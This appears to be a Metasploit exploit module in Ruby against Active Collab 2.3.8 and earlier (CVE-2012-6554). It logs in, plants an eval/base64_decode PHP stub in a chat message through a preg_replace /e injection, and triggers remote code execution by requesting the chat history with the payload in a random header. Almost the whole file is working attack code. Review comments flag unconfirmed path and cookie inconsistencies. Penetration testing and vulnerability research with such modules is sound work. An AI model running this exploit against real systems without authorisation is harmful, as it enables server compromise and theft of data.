GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/http/activecollab_chat.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
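class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Matches the ActiveCollab session cookie in the login response's Set-Cookie
  # data and captures its value (the cookie name carries a per-install suffix).
  SESSION_COOKIE_RE = /ac_ActiveCollab_sid_[a-zA-Z0-9]+=(.*); expires=/

  # Module metadata and options. Behaviour is unchanged from the original
  # registration; URI is the install path, USER/PASS are the login credentials.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Active Collab "chat module" Remote PHP Code Injection Exploit',
        'Description' => %q{
          This module exploits an arbitrary code injection vulnerability in the
          chat module that is part of Active Collab versions 2.3.8 and earlier by
          abusing a preg_replace() using the /e modifier and its replacement
          string using double quotes. The vulnerable function can be found in
          activecollab/application/modules/chat/functions/html_to_text.php.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'mr_me <steventhomasseeley[at]gmail.com>', # vuln discovery & msf module
        ],
        'References' => [
          ['CVE', '2012-6554'],
          ['OSVDB', '81966'],
          ['URL', 'http://www.activecollab.com/downloads/category/4/package/62/releases'],
        ],
        'Privileged' => false,
        'Payload' => {
          'Keys' => ['php'],
          'Space' => 4000,
          'DisableNops' => true,
        },
        'Platform' => ['php'],
        'Arch' => ARCH_PHP,
        'Targets' => [['Automatic', {}]],
        'DisclosureDate' => '2012-05-30',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('URI', [true, "The path to the ActiveCollab installation", "/"]),
        OptString.new('USER', [true, "The username (e-mail) to authenticate with"]),
        OptString.new('PASS', [true, "The password to authenticate with"])
      ]
    )
  end

  # Looks for an ActiveCollab install that has the chat module present.
  # The login page only exposes the product banner, not a version, so the
  # strongest verdict available from these two requests is Detected.
  #
  # @return [Msf::Exploit::CheckCode] Detected when the banner is present and
  #   the chat assets directory answers 200, Safe otherwise
  def check
    cms = send_request_raw({ 'uri' => "#{app_uri('public/index.php')}?path_info=login&re_route=homepage" }, 25)
    chat = send_request_raw({ 'uri' => app_uri('public/assets/modules/chat/') }, 25)

    # .to_s guards a response with no body; the original crashed on nil here
    return Exploit::CheckCode::Safe unless cms && cms.body.to_s.match?(/powered by activeCollab/)
    return Exploit::CheckCode::Safe unless chat && chat.code == 200

    Exploit::CheckCode::Detected
  end

  # Authenticates, stores the stub as a chat message, then requests the chat
  # history with the encoded payload carried in a randomly named request header.
  # Aborts via fail_with when the login step does not yield a session, instead
  # of sending the remaining requests with an empty cookie as the original did.
  #
  # @raise [Msf::Exploit::Failed] when login fails or the server does not respond
  def exploit
    user = datastore['USER']
    pass = datastore['PASS']
    encoded_payload = Rex::Text.encode_base64(payload.encoded)
    # Random header name; PHP exposes it to the stub as $_SERVER[HTTP_<name>]
    header = rand_text_alpha_upper(3)

    print_status("#{rhost}:#{rport} Logging in as #{user}")
    acsession = login_session(user, pass)

    # injection: the message text is the stub that reads the header at render time
    # NOTE(review): this request goes to index.php at the install root while the
    # login and history requests use public/index.php - confirm this is intended.
    iuri = "#{app_uri('index.php')}?path_info=chat/add_message&async=1"
    phpkode = "{\${eval(base64_decode(\$_SERVER[HTTP_#{header}]))}}"
    injection = "<th>\");#{phpkode}</th>"
    # NOTE(review): the cookie name uses a fixed suffix here, whereas the login
    # response was matched against a variable suffix (SESSION_COOKIE_RE) - verify.
    cookies = "ac_ActiveCollab_sid_eaM4h3LTIZ=#{acsession}"

    print_status("#{rhost}:#{rport} Posting chat message")
    send_request_cgi({
      'method' => 'POST',
      'uri' => iuri,
      'headers' => { 'cookie' => cookies },
      'vars_post' => {
        'submitted' => "submitted",
        'message[message_text]' => injection,
        'message[chat_id]' => "1",
        'message[posted_to_user_id]' => "all"
      }
    }, 25)

    # execution: rendering the history processes the stored message; the
    # response is intentionally not inspected (the payload handler takes over)
    euri = "#{app_uri('public/index.php')}?path_info=/chat/history/1"
    print_status("#{rhost}:#{rport} Requesting chat history")
    send_request_cgi({
      'method' => 'POST',
      'uri' => euri,
      'headers' => {
        header => encoded_payload,
        'cookie' => cookies
      }
    })
  end

  private

  # Joins path parts onto the configured URI option. normalize_uri collapses
  # duplicate slashes, so a trailing slash on URI needs no special handling.
  #
  # @param parts [Array<String>] path segments relative to the install path
  # @return [String] absolute request path
  def app_uri(*parts)
    normalize_uri(datastore['URI'], *parts)
  end

  # Submits the login form and returns the session id captured from the
  # Set-Cookie data of the 302 response. Every other outcome aborts the module.
  #
  # @param user [String] login e-mail
  # @param pass [String] login password
  # @return [String] session cookie value
  # @raise [Msf::Exploit::Failed] no response, rejected credentials, unexpected
  #   status, or a redirect without a session cookie
  def login_session(user, pass)
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => "#{app_uri('public/index.php')}?path_info=login",
      'vars_post' => {
        'login[email]' => user,
        'login[password]' => pass,
        'submitted' => "submitted",
      }
    }, 40)

    # The original's last branch dereferenced res even when it was nil
    fail_with(Failure::Unreachable, "#{rhost}:#{rport} No response to the login request") unless res

    if res.code == 302
      match = res.get_cookies.match(SESSION_COOKIE_RE)
      fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} Login redirected but no session cookie was set") unless match
      return match[1]
    end

    if res.body.to_s.match?(/Failed to log you in/)
      fail_with(Failure::NoAccess, "#{rhost}:#{rport} Could not login to the target application as #{user}:#{pass}")
    end

    fail_with(Failure::UnexpectedReply, "#{rhost}:#{rport} Server returned a failed status code: (#{res.code})")
  end
end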